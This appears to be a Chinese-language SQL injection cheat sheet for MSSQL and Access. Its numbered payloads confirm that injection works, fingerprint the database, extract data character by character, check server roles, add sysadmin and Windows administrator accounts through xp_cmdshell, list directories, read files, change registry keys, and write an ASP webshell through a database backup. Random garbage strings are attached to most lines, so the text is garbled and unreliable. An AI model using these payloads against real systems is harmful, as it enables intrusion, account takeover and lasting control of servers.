1.判断是否有注入;and 1=1 ;and 1=2 i��'t�p1CI
2.初步判断是否是mssql ;and user>0 �km�\%�BD~
=�n0�*�{~r
3.注入参数是字符'and [查询条件] and ''=' xm��H-!D�a
�\G;CQV#{9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 7�g6�RiH�}
59��!)�j>f
5.判断数据库系统 fLB1�)�kTS
7���7We;�a
;and (select count(*) from sysobjects)>0 mssql .3wY\W8Dr-
�o�3h�-�=t
;and (select count(*) from msysobjects)>0 access kx{!b�3��"
q)�iTn)�Z!
X?df�cS*!n
|}S1o0v{(a
6.猜数据库 ;and (select Count(*) from [数据库名])>0 <qY5S��V�,
cr�n �k�|o
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C�LK^�gZ�
[7\>�"v�6
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �e4.&a�IC[
}��uQ${]&D
9.(1)猜字段的ascii值(access) Do;#NLrW�b
y�J�D�>n�y
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 y1�,5$�0@G
U e*$&�VlT
(2)猜字段的ascii值(mssql) r!K|E95oj9
&!1�}`4$[T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �R6@�u�M<�
^:DyT@hQB5
10.测试权限结构(mssql) �N@1�p��]\
�5(J�^���N
o'Y#H
r�)/
"ahv�Nx;�x
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �Qpu3(`d<
;C�mOsA,1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- !�N~*E�I�$
J{����~Rxa
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �9S1#Lr`r
�$G[KT�):N
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- zj20;5o>U&
xo~g78jm7,
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 6�P+Dn�S[]
XO�
wiHW{�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- f\�}22��}/
)%mAZk-*;^
;and 1=(select IS_MEMBER('db_owner'));-- 3{3/: �7�
`��clB43�i
i6>R qP!69
pP\�h6b+B�
11.添加mssql和系统的帐户 A&N�*�F�"q
n,�ni�s��S
;exec master.dbo.sp_addlogin username;-- ��Y�x1� D)
;exec master.dbo.sp_password null,username,password;-- RvW.@#E�H0
�2R�`u[���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ?�,% TU&Yn
zilaP)5x6�
;exec master.dbo.xp_cmdshell 'net user username password 4}-#�mBV]/
og-]tEWA1�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �-1�����W
�?}�s�OG?{
;exec master.dbo.xp_cmdshell 'net user username password /add';-- o#�e�7,O��
g�rbTc�LSF
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- B>|5xpZM12
&�;v!�oe �
�;BI��)n]L
s���*JE)��
12.(1)遍历目录 �3�qo e^e
o}~3�JBn�T
;create table dirs(paths varchar(100), id int) &=z�U611,
��sX�B+s��
;insert dirs exec master.dbo.xp_dirtree 'c:\' V2�Y$yV8g1
�>&hX&,hG
;and (select top 1 paths from dirs)>0 m2b��`/�JW
w3b�Ib�$12
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) u��^=@DO�'
����Y�Mu�)
a8JN��19}D
�},�PB�qWe
(2)遍历目录 �UC|JAZ�L
fn�1�pa@P�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- G�(\C�kf:�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 RgGA$H�N�/
g�1qi\axm
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 F^rl�$#pCS
�W)-hU~^OM
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 p�&5�S|![\
bi,�mM,N/�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �l�* �Y[^'
W5/};�K\�.
0N VI��+Z$
7�@P656{�
13.mssql中的存储过程 �RpN� �<�=
���Qa?aL�
xp_regenumvalues 注册表根键, 子键 e\.HWV��]I
�};p~A�-E=
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $ !5f"<FCB
K:w]>���a�
xp_regread 根键,子键,键值名 (1 yGg==W.
,n5�a]�)Dg
;exec xp_regread h,]�+��>`b
wOcg4�H�lW
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �)��E`+�BH
��oKiD8�':
xp_regwrite 根键,子键, 值名, 值类型, 值 P)I�j�L&�[
b~�a��s6�4
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 .e�$%[��)D
'w6hW�7"L�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 UE7'B��?
u]�*5Ex�(?
xp_regdeletevalue 根键,子键,值名 ysVi3�e��q
�w��_H2gaQ
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��oC�A(FQ6
x@V�t�[�}e
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 0n�5!B..m}
^0Q'./A{�&
8uA�<G/Q;
[B,p,��Q�"
14.mssql的backup创建webshell 2 `�&<bt[g
�dXO�=ZU/N
use model f".q�9{+p,
ka�O{#i2�-
create table cmd(str image); �yoW>�
�BX
jGiw96,�Y�
insert into cmd(str) values (''); 4:�`[q�E�3
ra�HV�kE{<
backup database model to disk='c:\l.asp'; 2O�i�'�E�
�Y^3)!��>�
$_bZA;E�MQ
_H2tZ�%R�M
15.mssql内置函数 >Bx8IO1_\d
��%^!aB
;and (select @@version)>0 获得Windows的版本号 kjX7- ZP�Y
b[��0S=e
G
;and user_name()='dbo' 判断当前系统的连接用户是不是sa z�n^�v�!:[
�O+vcs4�
;and (select user_name())>0 爆当前系统的连接用户 OQ�c{
�V��
{? 2;0}3?;
;and (select db_name())>0 得到当前连接的数据库 d�<v�~�=�
sMX�$�Q45e
HTN$ �>QTI
��,��`"�K�
16.简洁的webshell +,wWhhvlzv
B~r�U1Y)�
use model ZM
8U]0[�X
BPiiexTV9
create table cmd(str image); j�Yk5~<\�k
7vq
��DZg�
insert into cmd(str) values (''); Dt|fDw$]�D
19&)Yd1���
backup database model to disk='g:\wwwtest\l.asp';
